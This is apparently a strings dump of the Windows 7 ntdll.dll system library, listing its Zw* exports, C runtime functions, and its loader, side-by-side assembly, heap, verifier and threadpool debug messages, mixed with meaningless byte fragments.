ZwOpenProcessToken ZwOpenProcessTokenEx ZwOpenResourceManager ZwOpenSection ZwOpenSemaphore ZwOpenSession ZwOpenSymbolicLinkObject ZwOpenThread ZwOpenThreadToken ZwOpenThreadTokenEx ZwOpenTimer ZwOpenTransaction ZwOpenTransactionManager ZwPlugPlayControl ZwPowerInformation ZwPrePrepareComplete ZwPrePrepareEnlistment ZwPrepareComplete ZwPrepareEnlistment ZwPrivilegeCheck ZwPrivilegeObjectAuditAlarm ZwPrivilegedServiceAuditAlarm ZwPropagationComplete ZwPropagationFailed ZwProtectVirtualMemory ZwPulseEvent ZwQueryAttributesFile ZwQueryBootEntryOrder ZwQueryBootOptions ZwQueryDebugFilterState ZwQueryDefaultLocale ZwQueryDefaultUILanguage ZwQueryDirectoryFile ZwQueryDirectoryObject ZwQueryDriverEntryOrder ZwQueryEaFile ZwQueryEvent ZwQueryFullAttributesFile ZwQueryInformationAtom ZwQueryInformationEnlistment ZwQueryInformationFile ZwQueryInformationJobObject ZwQueryInformationPort ZwQueryInformationProcess ZwQueryInformationResourceManager ZwQueryInformationThread ZwQueryInformationToken ZwQueryInformationTransaction ZwQueryInformationTransactionManager ZwQueryInformationWorkerFactory ZwQueryInstallUILanguage ZwQueryIntervalProfile ZwQueryIoCompletion ZwQueryKey ZwQueryLicenseValue ZwQueryMultipleValueKey ZwQueryMutant ZwQueryObject ZwQueryOpenSubKeys ZwQueryOpenSubKeysEx ZwQueryPerformanceCounter ZwQueryPortInformationProcess ZwQueryQuotaInformationFile ZwQuerySection ZwQuerySecurityAttributesToken ZwQuerySecurityObject ZwQuerySemaphore ZwQuerySymbolicLinkObject ZwQuerySystemEnvironmentValue ZwQuerySystemEnvironmentValueEx ZwQuerySystemInformation ZwQuerySystemInformationEx ZwQuerySystemTime ZwQueryTimer ZwQueryTimerResolution ZwQueryValueKey ZwQueryVirtualMemory ZwQueryVolumeInformationFile ZwQueueApcThread ZwQueueApcThreadEx ZwRaiseException ZwRaiseHardError ZwReadFile ZwReadFileScatter ZwReadOnlyEnlistment ZwReadRequestData ZwReadVirtualMemory ZwRecoverEnlistment ZwRecoverResourceManager ZwRecoverTransactionManager ZwRegisterProtocolAddressInformation ZwRegisterThreadTerminatePort ZwReleaseKeyedEvent ZwReleaseMutant ZwReleaseSemaphore ZwReleaseWorkerFactoryWorker ZwRemoveIoCompletion ZwRemoveIoCompletionEx ZwRemoveProcessDebug ZwRenameKey ZwRenameTransactionManager ZwReplaceKey ZwReplacePartitionUnit ZwReplyPort ZwReplyWaitReceivePort ZwReplyWaitReceivePortEx ZwReplyWaitReplyPort ZwRequestPort ZwRequestWaitReplyPort ZwResetEvent ZwResetWriteWatch ZwRestoreKey ZwResumeProcess ZwResumeThread ZwRollbackComplete ZwRollbackEnlistment ZwRollbackTransaction ZwRollforwardTransactionManager ZwSaveKey ZwSaveKeyEx ZwSaveMergedKeys ZwSecureConnectPort ZwSerializeBoot ZwSetBootEntryOrder ZwSetBootOptions ZwSetContextThread ZwSetDebugFilterState ZwSetDefaultHardErrorPort ZwSetDefaultLocale ZwSetDefaultUILanguage ZwSetDriverEntryOrder ZwSetEaFile ZwSetEvent ZwSetEventBoostPriority ZwSetHighEventPair ZwSetHighWaitLowEventPair ZwSetInformationDebugObject ZwSetInformationEnlistment ZwSetInformationFile ZwSetInformationJobObject ZwSetInformationKey ZwSetInformationObject ZwSetInformationProcess ZwSetInformationResourceManager ZwSetInformationThread ZwSetInformationToken ZwSetInformationTransaction ZwSetInformationTransactionManager ZwSetInformationWorkerFactory ZwSetIntervalProfile ZwSetIoCompletion ZwSetIoCompletionEx ZwSetLdtEntries ZwSetLowEventPair ZwSetLowWaitHighEventPair ZwSetQuotaInformationFile ZwSetSecurityObject ZwSetSystemEnvironmentValue ZwSetSystemEnvironmentValueEx ZwSetSystemInformation ZwSetSystemPowerState ZwSetSystemTime ZwSetThreadExecutionState ZwSetTimer ZwSetTimerEx ZwSetTimerResolution ZwSetUuidSeed ZwSetValueKey ZwSetVolumeInformationFile ZwShutdownSystem ZwShutdownWorkerFactory ZwSignalAndWaitForSingleObject ZwSinglePhaseReject ZwStartProfile ZwStopProfile ZwSuspendProcess ZwSuspendThread ZwSystemDebugControl ZwTerminateJobObject ZwTerminateProcess ZwTerminateThread ZwTestAlert ZwThawRegistry ZwThawTransactions ZwTraceControl ZwTraceEvent ZwTranslateFilePath ZwUmsThreadYield ZwUnloadDriver ZwUnloadKey ZwUnloadKey2 ZwUnloadKeyEx ZwUnlockFile ZwUnlockVirtualMemory ZwUnmapViewOfSection ZwVdmControl ZwWaitForDebugEvent ZwWaitForKeyedEvent ZwWaitForMultipleObjects ZwWaitForMultipleObjects32 ZwWaitForSingleObject ZwWaitForWorkViaWorkerFactory ZwWaitHighEventPair ZwWaitLowEventPair ZwWorkerFactoryWorkerReady ZwWriteFile ZwWriteFileGather ZwWriteRequestData ZwWriteVirtualMemory ZwYieldExecution _CIcos _CIlog _CIpow _CIsin _CIsqrt __isascii __iscsym __iscsymf __toascii _alldiv _alldvrm _allmul _alloca_probe _alloca_probe_16 _alloca_probe_8 _allrem _allshl _allshr _atoi64 _aulldiv _aulldvrm _aullrem _aullshr _chkstk _fltused _ftol _i64toa _i64toa_s _i64tow _i64tow_s _itoa _itoa_s _itow _itow_s _lfind _ltoa _ltoa_s _ltow _ltow_s _makepath_s _memccpy _memicmp _snprintf _snprintf_s _snscanf_s _snwprintf _snwprintf_s _snwscanf_s _splitpath _splitpath_s _strcmpi _stricmp _strlwr _strnicmp _strnset_s _strset_s _strupr _swprintf _ui64toa _ui64toa_s _ui64tow _ui64tow_s _ultoa _ultoa_s _ultow _ultow_s _vscwprintf _vsnprintf _vsnprintf_s _vsnwprintf _vsnwprintf_s _vswprintf _wcsicmp _wcslwr _wcsnicmp _wcsnset_s _wcsset_s _wcstoui64 _wcsupr _wmakepath_s _wsplitpath_s _wtoi _wtoi64 _wtol atan atoi atol bsearch ceil fabs floor isalnum isalpha iscntrl isdigit isgraph islower isprint ispunct isspace isupper iswalpha iswctype iswdigit iswlower iswspace iswxdigit isxdigit labs mbstowcs memchr memcmp memcpy memcpy_s memmove memmove_s memset qsort sprintf sprintf_s sqrt sscanf sscanf_s strcat strcat_s strchr strcmp strcpy strcpy_s strcspn strlen strncat strncat_s strncmp strncpy strncpy_s strnlen strpbrk strrchr strspn strstr strtok_s strtol strtoul swprintf swprintf_s swscanf_s tolower toupper towlower towupper vDbgPrintEx vDbgPrintExWithPrefix vsprintf vsprintf_s vswprintf_s wcscat wcscat_s wcschr wcscmp wcscpy wcscpy_s wcscspn wcslen wcsncat wcsncat_s wcsncmp wcsncpy wcsncpy_s wcsnlen wcspbrk wcsrchr wcsspn wcsstr wcstol wcstombs wcstoul SVW3 <$tPf <$tN ^[_3 ^_[3 u#SW .txt2 .txt secserv.dll .sforce .pcle .aspack Set 0x%X protection for %p section for %d bytes, old protection 0x%X CLIENT(ntdll): Tyring to fix protection for %ws section in %wZ module to 0x%X CLIENT(ntdll): Processing section info %ws... CLIENT(ntdll): Processing %ws for patching section protection for %wZ CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions %04x:%04x @ %08d - %s - %s: Status: 0x%08lx SxS redirection of DLL %wZ failed with status 0x%08lx Locating DLL %wZ in path %wZ DLL name %wZ was redirected to %wZ by SxS d:\w7rtm\minkernel\ntdll\ldrapi.c LdrGetDllHandleEx DLL name: %wZ DLL path: %ws LdrVerifyImageMatchesChecksumEx LdrReadMemory LdrLockLoaderLock LdrUnlockLoaderLock Uninitializing DLL "%wZ" (Init routine: %p) LdrpUnloadDll Unmapping DLL "%wZ" Loading procedure 0x%lx by ordinal LdrGetProcedureAddressEx Locating procedure "%Z" by name Loading DLL %wZ from path %wZ DLL %wZ was redirected to %wZ by SxS LdrpLoadDll DLL name: %wZ DLL path: %wZ LdrLoadDll d:\w7rtm\minkernel\ntdll\ldrfind.c LdrpFindKnownDll DLL name: %wZ LdrpResolveFileName LdrpResolveDllName LdrpMapViewOfSection DLL name: %ws Changing the protection of the executable at %p failed with status 0x%08lx LdrpProtectAndRelocateImage Querying large page info failed with status 0x%08lx LdrpRelocateImage LdrpSearchPath LdrpFindOrMapDll LdrpFindLoadedDll BaseThreadInitThunk stxt371 BoG_ *90.0&!! Yy> d:\w7rtm\minkernel\ntdll\ldrinit.c LdrpInitializationFailure Process initialization failed with status 0x%08lx LdrpInitializeProcessWrapperFilter Process initialization raised exception 0x%08lx Exception record: .exr %p Context record: .cxr %p LdrpRunShimEngineInitRoutine Could not locate the init routine for the shim engine DLL LdrShutdownProcess Process 0x%x (%wZ) exiting LdrpInitializeApplicationVerifierPackage Per-DLL page heap is disabled since fast fill heap is enabled LdrpTouchThreadStack LdrpGetShimEngineInterface Could not locate procedure "%s" in the shim engine DLL SE_ProcessDying SE_GetProcAddressLoad SE_LdrEntryRemoved SE_DllUnloaded SE_DllLoaded SE_InstallAfterInit SE_InstallBeforeInit The init routine for the shim engine DLL "%wZ" failed LdrpLoadShimEngine Loading the shim engine DLL "%wZ" failed with status 0x%08lx Initializing the application verifier package failed with status 0x%08lx LdrpInitializeExecutionOptions Initializing the app verifier package failed with status 0x%08lx Running the init routines of the executable's static imports failed with status 0x%08lx Loading Windows subsystem DLL "%wZ" failed with status 0x%08lx Walking the import tables of the executable and its static imports failed with status 0x%08lx Locating procedure "%Z" in Windows subsystem DLL "%wZ" failed with status 0x%08lx Initializing TLS slots failed with status 0x%08lx Allocating a data table entry for the application verifier DLL failed Initializing the current directory to "%wZ" failed with status 0x%08lx Beginning execution of %wZ (%wZ) Current directory: %wZ Search path: %wZ Allocating a data table entry for the system DLL failed Allocating a data table entry for the executable failed Allocating a buffer to hold the current working directory failed Opening the known DLL directory link object failed with status 0x%08lx Querying the known DLL directory link object failed with status 0x%08lx Creating the process heap failed Stack trace database size is %ld Mb Initializing process 0x%lx LdrpInitializeProcess Initializing the execution options for the process %lx failed with status 0x%08lx BaseQueryModuleData Delaying execution failed with status 0x%08lx _LdrpInitialize SaferiIsDllAllowed d:\w7rtm\minkernel\ntdll\ldrsnap.c Loading DLL %wZ from path %wZ failed with status 0x%08lx DLL name %wZ was redirected to %wZ by SxS. LdrpLoadImportModule DLL name: %s DLL path: %wZ Init routine %p for DLL "%wZ" failed during DLL_PROCESS_ATTACH Calling init routine %p for DLL "%wZ" LdrpRunInitializeRoutines Calling the Windows subsystem post-import routine %p failed with status 0x%08lx Procedure "%s" could not be located in DLL "%s" Ordinal 0x%lx could not be located in DLL "%s" Unknown LdrpSnapThunk Hint index 0x%lx for procedure "%s" in DLL "%s" is invalid LdrpUpdateLoadCount2 %s loaded DLL "%wZ" (new reference count: 0x%lx) Referencing Dereferencing Pinning LdrpFixupIATForRelocatedImport LdrpSnapIAT DLL "%wZ" does not contain an export table Snapping the invalid bindings from DLL "%wZ" to DLL "%wZ" failed with status 0x%08lx Recording a static forwarder link from DLL "%wZ" to DLL "%wZ" failed with status 0x%08lx DLL "%wZ" is bound via forwarders to "%s" Recording a static link from DLL "%wZ" to DLL "%wZ" failed with status 0x%08lx Loading "%ws" from the bound import table of DLL "%wZ" failed with status 0x%08lx DLL "%wZ" is bound to "%s" LdrpHandleOneNewFormatImportDescriptor Snapping the imports from DLL "%wZ" to DLL "%wZ" failed with status 0x%08lx Loading "%ws" from the import table of DLL "%wZ" failed with status 0x%08lx DLL "%wZ" imports "%s" LdrpHandleOneOldFormatImportDescriptor Querying the active activation context failed with status 0x%08lx LdrpProcessStaticImports Probing for the manifest of DLL "%wZ" failed with status 0x%08lx d:\w7rtm\minkernel\ntdll\ldrtls.c TlsVector %p Index %d : %d bytes copied from %p to %p LdrpAllocateTls LdrpCallTlsInitializers Calling TLS callback %p for DLL "%wZ" at %p LdrpAllocateTlsEntry LdrpHandleTlsData LdrpInitializeTls DLL "%wZ" has TLS information at %p Execute '.cxr %p' to dump context Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? ***Exception thrown within loader*** d:\w7rtm\minkernel\ntdll\ldrutil.c LdrpGenericExceptionFilter Function %s raised exception 0x%08lx Exception record: .exr %p Context record: .cxr %p RTL: Re-Waiting RTL: Resource at %p RTL: Acquire Shared Sem Timeout %d(%I64u secs) RTL: Acquire Exclusive Sem Timeout %d (%I64u secs) NumberOfActive = %lx NumberOfWaitingExclusive = %lx NumberOfWaitingShared = %lx Resource @ %lx NTDLL: Calling thread (%X) not owner of CritSect: %p Owner ThreadId: %X RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu RTL: Enter Critical Section Timeout (%I64u secs) %d Thread is in a state in which it cannot own a critical section Thread identifier double initialized or corrupted critical section Critical section address. First initialization stack trace. Use dps to dump it if non-NULL. Second initialization stack trace. Use dps to dump it if non-NULL. corrupted critical section Invalid debug info address of this critical section Address of the debug info found in the active list. undeleted critical section in freed memory Critical section address Critical section debug info address Initialization stack trace. Use dps to dump it if non-NULL. User32 init not called AVRF: provider %ws was not found in the initialization list AVRF: provider %ws AVRF: Found duplicate for (%ws: %s) in %ws AVRF: chain: thunk: %s == %s ? AVRF: chain: dll: %ws AVRF: chain: searching in %ws AVRF: Chaining (%ws: %s) to %ws AVRF: Checking %ws for duplicate (%ws: %s) AVRF: Snapped (%ws: %s) with (%ws: %p). AVRF: internal error: New thunk for %s is null. AVRF: Unable to unprotect IAT to modify thunks (status %08X). AVRF: (%ws) %s export found. AVRF: warning: did not find `%s' export in %ws . AVRF: failed to enable handle checking (status %X) AVRF: Failed to find `VerifierStopMessage()' export in verifier.dll! VerifierStopMessage AVRF: Failed to find verifier.dll among loaded providers! =========================================================== VERIFIER STOP %p: pid 0x%X: %s %p : %s %p : %s %p : %s %p : %s =========================================================== AVRF: exception raised while probing provider %ws AVRF: exception raised in provider %ws initialization routine AVRF: provider %ws did not initialize correctly AVRF: initialized provider %ws (descriptor @ %p) AVRF: provider %ws passed an invalid descriptor @ %p AVRF: cannot find an entry point for provider %ws AVRF: provider %ws is not a DLL image AVRF: %ws: failed to load provider `%ws' (status %08X) from %ws AVRF: verifier dll `%ws' AVRF: pid 0x%X: found dll descriptor for `%ws' with verified exports AVRF: skipped resnapping provider %ws ... AVRF: resnapping %ws ... AVRF: AVrfDllUnloadNotification called for a provider (%p) AVRF: -*- final list of providers -*- AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error. AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled rUS.Length <= This->PrivatePreallocatedString->MaximumLength (This->PrivateDynamicallyAllocatedString == NULL) || (This->PrivateDynamicallyAllocatedString->Buffer == NULL) Internal error check failed d:\w7rtm\minkernel\ntdll\sxsisol.cpp This != NULL Status != STATUS_NOT_FOUND !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT) [%x.%x] SXS: %s - Relative redirection plus env var expansion. sxsisol_SearchActCtxForDllName Status != STATUS_SXS_SECTION_NOT_FOUND SXS: WarningationActivationContextDetailedInformation SXS: %s() found activation context data at %p with wrong format RtlpQueryRunLevel SXS: %s() - internal coding error; missing switch statement branch for InfoClass == %lu SXS: %s() - caller asked to use active activation context but passed %p SXS: %s() - Caller passed invalid hmodule (%p) SXS: %s() - Caller asked to use activation context from hmodule but passed NULL SXS: %s() - Caller passed invalid address, not in any .dll (%p) SXS: %s() - Caller asked to use activation context from address in .dll but passed NULL SXS: %s() - caller supplied no buffer to populate and no place to return required byte count SXS: %s() - caller passed nonzero buffer length but NULL buffer pointer SXS: %s() - caller asked for unknown information class %lu SXS: %s() - Caller passed meaningless flags/class combination (0x%08lx/0x%08lx) SXS: %s() - Caller passed invalid flags (0x%08lx) RtlQueryInformationActivationContext RtlpLocateActivationContextSection() found section at %p (length %lu) which is not a string section SXS: Assembly storage root location for %wZ does not fit in a UNICODE STRING SXS: Assembly storage root location value has non-even size SXS: Assembly storage root location value type is not REG_SZ SXS: Unabel to query location from storage root subkey %wZ; Status = 0x%08lx SXS: Unable to open storage root subkey %wZ; Status = 0x%08lx SXS: Unable to open registry key %wZ Status = 0x%08lx SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx SXS: %s() bad parameters: SXS: Map : 0x%lx SXS: EntryCount : 0x%lx RtlpInitializeAssemblyStorageMap SXS: %s() bad parameters SXS: Map : %p SXS: AssemblyRosterIndex : 0x%lx SXS: Map->AssemblyCount : 0x%lx SXS: StorageLocation : %p SXS: StorageLocation->Length: 0x%x SXS: StorageLocation->Buffer: %p SXS: OpenDirectoryHandle : %p RtlpInsertAssemblyStorageMapEntry SXS: %s() bad parameters SXS: Flags: 0x%lx SXS: Root: %p SXS: AssemblyDirectory: %p SXS: PreAllocatedString: %p SXS: DynamicString: %p SXS: StringUsed: %p SXS: OpenDirectoryHandle: %p RtlpProbeAssemblyStorageRootForAssembly SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx SXS: Attempt to translate DOS path name "%S" to NT format failed SXS: Assembly storage resolution failing probe because attempt to allocate %u bytes failed. SXS: Assembly storage resolution failing probe because combined path length does not fit in an UNICODE_STRING. SXS: %s() bad parameters: SXS: Flags : 0x%lx SXS: Peb : %p SXS: ActivationContextData: %p SXS: AssemblyStorageMap : %p SXS: %s() passed the empty activation context RtlpGetActivationContextDataStorageMapAndRosterHeader SXS: %s() bad parameters SXS: Map : %p SXS: Data : %p SXS: AssemblyRosterIndex: 0x%lx SXS: Map->AssemblyCount : 0x%lx RtlpResolveAssemblyStorageMapEntry SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p SXS: %s() bad parameters: SXS: Flags : 0x%lx SXS: AssemblyRosterIndex: 0x%lx SXS: AssemblyStorageRoot: %p SXS: Callback : %p SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx RtlGetAssemblyStorageRoot 'LDR: %s(), invalid image format of MUI file LdrpLoadResourceFromAlternativeModule HEAP: Free Heap block %lx modified at %lx after it was freed HEAP: HEAP[%wZ]: ((PHEAP_ENTRY)LastKnownEntry <= Entry) (UCRBlock->Size >= *Size) ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)) Heap block at %p modified at %p past requested size of %lx RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %x) ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %p) (HeapHandle != NULL) (!TrailingUCR) (LONG)FreeEntry->Size > 1 ((LONG)FreeEntry->Size > 1) (UCRBlock != NULL) !(Flags & ~HEAP_CREATE_VALID_MASK) Break repeatedly, break Once, Ignore, terminate Process, or terminate Thread (boipt)? *** Assertion failed: %s%s *** Source File: %s, line %ld RtlQueryRegistryValues: Miscomputed buffer size at line %d *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlpSetPreferredUILanguages is not a valid multi-string! *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSsegment %p Trace database: failing attempt to save biiiiig trace (size %u) *** RtlpMuiRegLoadLicInformation failed with status %x .hotp1 Invalid fixup information %08I64X: Unknown None%s (padding) %08I64X: VA32 %08X -> %08X %s %08I64X: PC32 %08X -> %08X (target %p) %s %08I64X: VA64 %016I64X -> %016I64X %s (no change) Invalid source hotpatch validation range Invalid target validation range Validation failure. Source = %p, Target = %p, Size = %x Invalid hotpatch validation array pointer Validation failed for global range %u of %u Skipping hook-specific validation range during global validation Hook type not yet implemented Invalid hotpatch validation pointer in hook record %02X %08I64X: jmp %08X (PC+%08X) { Invalid hotpatch relative address Unsupported template type Invalid hook type specified Hotpatch loaded > 2GB from target image Invalid hotpatch hook pointer Invalid target base address Invalid hotpatch base address Invalid hotpatch hook array pointer Inserting %u hooks into target image No hooks defined in hotpatch Header too large (%u>%u) for copy/normalize/validate Failed to normalize PE header for validation PE header hash ID comparsion failure (PE2) HOTP_ID_None HOTP_ID_PeHeaderHash1 HOTP_ID_PeHeaderHash2 HOTP_ID_PeDebugSignature Unrecognized Critical error detected %lx Stack trace available at %p Last known valid blocks: before - %p, after - %p Parameter3: %p Parameter2: %p Parameter1: %p Error code: %d - %s heap_failure_listentry_corruption heap_failure_freelists_corruption heap_failure_cross_heap_operation heap_failure_usage_after_free heap_failure_invalid_argument heap_failure_block_not_busy heap_failure_buffer_underrun heap_failure_buffer_overrun heap_failure_virtual_block_corruption heap_failure_multiple_entries_corruption heap_failure_entry_corruption heap_failure_generic heap_failure_unknown heap_failure_internal Heap error detected at %p (heap handle %p) This is located in the %s field of the heap header. Heap %p - headers modified (%p is %lx instead of %lx) Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x) Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x) Heap block at %p has corrupted PreviousSize (%lx) Heap block at %p is not last block in segment (%p) Heap block at %p has incorrect segment offset (%x) Free Heap block %p modified at %p after it was freed Heap entry %p has incorrect PreviousSize field (%04x instead of %04x) Specified HeapBase (%p) is free or not writable Specified HeapBase (%p) != to BaseAddress (%p) Specified HeapBase (%p) invalid, Status = %lx May not specify Lock parameter with HEAP_NO_SERIALIZE Invalid CommitSize parameter - %x Invalid ReserveSize parameter - %x Invalid address specified to %s( %p, %p ) Tag %04x (%ws) size incorrect (%x != %x) %p Pseudo Tag %04x size incorrect (%x != %x) %p Total size of free blocks in arena (%ld) does not match number total in heap header (%ld) Number of free blocks in arena (%ld) does not match number in the free lists (%ld) Non-De Y__^[ (SVW `SV3 K\ E 9$r A [_^ uzW [^_] /$&@7$&@9$&@:$&@ V6W6X6Y6Z6[6\6]6^6e6f6g6h6i6j6l6 _^[] Ar f Ar f BBFF "OR2N "GR2F f3OT 9_Lt t 3GP t29_L OLt 3OP CTf3E KTf3 t 3GP f3OT 9{Lt _^[3 t j PQ BBFF _^[] _^[] t f; _^[] :uLf wRETURN ENTER INFO WARNING ERROR ?SsHd t 9E SWj< t 9_ VW9] _^[] _f9>r SVW3 3tS; NN;w _^[] ^_[] j\Zf @0Sh j\Zf; _^[] AABB [_^] f9A: wSVj f9Q8 X0VW t$f9 FFJu PjTV @0VS QQSVW QSWP v 9] wVhP f9X$u P @ @u 9^(t Y_^[ _[^] @ONu =t}@@ @@GG @@Nu f9X:u Pj$j [_^] SPVW t 3BP 0123456789ABCDEF j!Xf WQSf @@^; {_[] QQVj QSVW jd[+ F @u @0Vj _^[] _^[] t79} _^[] wSVW @@f; ]"f9 SVW3 @0hT Q@PS _^[] PjUV _^[] @0Sj _^[] Jt(Jt KPVW _^[] t49] t/f9 @@f; F _^] f9H8 j=Xf Pj$j _[^] Q0SVW3 tgHtwH 7JGG >SsHd tS9] |=9] t4f9 F ;E F$;E _^[] tM;~ u 8] QQS3 GFFf9 f9>u t f9> SVWj _^[] jlh@ tJ9] N" F _^[] ;p(s @Tf3E f3GT GTf3 SVWt[ 0^[] 9^Lt j\hh jphp f9H8t& H8Af wWVS w ;M E$+E E$+E f3CTf )FlS _[h0 NHQPW t%9] QQSV rESVW ?%t_ _^[| FFC; jXhX Pj 3 _^[] wVhD w[SVf @0WS @@CC;] j\Yf }w=5 @$3A 3 3^_[ w;H$ _^[] FX^] D8$Pj _^[] wVhD QSSW @0Vj uAFF@@ H_[] f9H8 H8Af FP;C ;ATr ;APs @@f; |[VW SSSh 9](u j(hX VWte QPSh C(PV @0Vj VhUr ^_[] Actx |MVW u0Wj Pj"V Pj"V ^[_] 7_^] w9u @0Qj AAQP AAQP Pj.j CDPW j0XPW f9~0 w)Fl wVWW |%Sj f92t, P$f92 H [] f9C8 wf9C C2^f A\^] @0Wj Vj$j Pj$j Pj$j @0SS wVh@ jRESCup rO9FDwJ FP;F8wB r:9FHw5 9FX} 9F\} 9F`} @_^] wWhP _^[] @0Wj PWVj @0Vj _^[] 9^(t tK9^$u |3hB tc9X @0Vj wVhP @0Vj$j Wj _ CSPj ( 8PP 700WP `h```` xpxxpp _^[] WWWWW j+Yf PPPPP RPSV uJ!E PWSj jJXf jLXf wjHXf jJXf jBXf jDXf wj@Xf jBXf j4Xf j6Xf wj2Xf j4Xf j6Xf j8Xf wj4Xf j6Xf QSSPj |88] jTXf jVXf wjRXf jTXf ]#8] 8]#u 9] E4 t E$+E j\Xf v%HH PSSS _^[] PVVV j0_W wVhD H$f;M jdh VhRPQ d:\w7rtm\minkernel\threadpool\ntdll\timer.c PSVW TpAllocTimer FThX d:\w7rtm\minkernel\threadpool\ntdll\pool.c _^[] ;~(s j hp G9=L 1^_] tNVWS f9P8u/ H8Af QPSSj@PV @$9^Lt _[^] SVWf _^[] ^[_] _^[] SVWj/Y3 t09E [j\Yf PWj CSVh@ QSSj @_^[ PSWV V09U j0Xf wVh@ @@f; wWh@ t :Q KTf3 d:\w7rtm\minkernel\threadpool\ntdll\work.c TppWorkDestroy j h 99t! u>9u 0r>f 9w8k _^[] 8^Tu t);5 9^(v G;~(r w$WPV _^[] tN9} AcMg _^[] j\Zf _^[] TpDisablePoolCallbackChecks QQSVj SVWj 6_^[] tp9Q tR9Q t 9] 8SsHd j@^V @0VS PSSS F^PW @0VS @@f; TppTimerpStopCallbackGeneration PSSj @0WS v 9u wS9=, Xy PSSj PSSh @0WS \tyf Whj{ wtsVWhz{ VWhz{ Vh>y VWh>y wt"P QWhdv Pj"j PWhR PWh< ~huE |(Sj ~htp whB F$PQh $Vh4 $PVh $Vh< 9Blr wt"P $Ph` F$Ph $Vh< $Vh$ wt"W F$Ph^ wShD wShD RPWhP RPWh _[^] @ VQRPh wShP wWh wShP wWh` wVh SSSS SSSS PSSW }'9] SSSS QSPV wSSSSj |n9^ |3Sj 9_0u r ;M r ;M wVj3 wVj3 j,QPh ;RQPh ,RQPh RQPh j8QPh wVj3 RQPh wVj3 wQj3 wWj3 VPhb wSj3 wSj3 wSj3 wSj3 wSj3 wSj3 wSj3 wSj3 wSj3 wSj3 wSj3 wSj3 wWj3 RQWP @0Vj wWj3 wPj3 j\Xf wWj3 VSh. wWj3 wWj3 @0Vj @0Vj QVh< wSj3 wSj3 wSj3 } VWhf wSj3 wSj3 wSj3 wSj3 RWQPh8 wSj3 wWj3 wWj3 1VhP wWj3 QSPh wWj3 SSSW PhPS PhXS Ph8X Ph@X PhxX f95* wt7S @0Vj u:9E ue9M @0Sj @0Vj f9C^ u'j< ;0se tK9] 1HAf HABB OHBB t09M PSSW @0WS @0Sj SRSPSj SSVPSj WSPj SRWVSj PVQj PSRj WSPj WShT @09p WQRPSj QRPW sLt 3sP sLt 3sP QVQPQj @@;E t%f;U f;DU Af;M f;DU Af;M t-f;E Gf;} Gf;} VWum j ^; j [; t!)M PWSj HHt. @0Vj w;A` QSSPj t +M @0QS t!hB @0WS }!WV @0V3 VVVPQj VVVRQj W`f; j-Xf SSSSS SSSSS PPPPP SSSSS SSSSS SSSSS SSSSS RRRRR PPPPP SSSSS SSSSS w ;u PPPPP ^RRRRR RRRRR ^RRRRR j-XC RRRRR SSSSS SSSSS SSSSS SSSSS SSSSS QQQQQ QQQQQ ^QQQQQ RRRRR ^RRRRR SSSSS _SSSSS VVVVV RRRRR RRRR3 ^RRRR3 VVVVV _VVV3 VVVVV _VVV3 WWWWW ^WWW3 @@BBf; PPPPP SSSSS s(Y3 WjmV TpReleaseIoCompletion wWhp wWh| Sj_V SjqV SjmV TpStartAsyncIoOperation wShp wSh| Wj_V WjqV WjmV TpCancelAsyncIoOperation wShp wSh$ VhPT TppPoolAddWorker Pool = %p, Tcb = %p TppPoolRemoveWorker Pool: %p TpPoolReferenceExistingGlobalPool ws); ZjPS TpReleasePool TppPoolpFree wSh$ wSh$ Pool = %p, MinThreads = %d Pool = %p, MaxThreads = %d Wh' WhP wSh$ Wh2 File = %x, Direct = %p, Pool = %p Why wSh$ AlpcPort = %x, Direct = %p, Pool = %p TppPoolpDereferenceGlobalPool TpDereferenceGlobalPool wWSh whh] Releasing a worker thread TpPostTask Task = %p, Pool = %p ;^(s 98t) 98t) 9>t# u!Vh$ Allocated wait %p TppWaitAlloc WaitReturn = %p, Callback = %p, Context = %p, CallbackEnviron = %p, Flags = %p OjPQ WaitReturn = %p, Callback = %p, Context = %p, CallbackEnviron = %p VRQP TppWaitpSet Wait = %p, Handle = %p, Timeout = 0x%I64x x100ns, Interrupt = 0x%I64x x100ns Wj^V WjpV WjlV TpSetWait Wj^V WjpV WjlV TppSetWaitInterrupt Wj^V WjpV WjlV Count = %d TpWaitOutstandingCallbackCount Wj^V WjpV WjlV TpWaitForWait Wait = %p, CancelPendingCallbacks = %hs Wj^V WjpV WjlV TpReleaseWait TppWaitpFree wVh< TppWorkCancelPendingCallbacks wVhH TppWorkWait ~t!~t TppWorkInitialize Work = %p, Context = %p, CallbackEnviron = %p, Flags = 0x%08x, 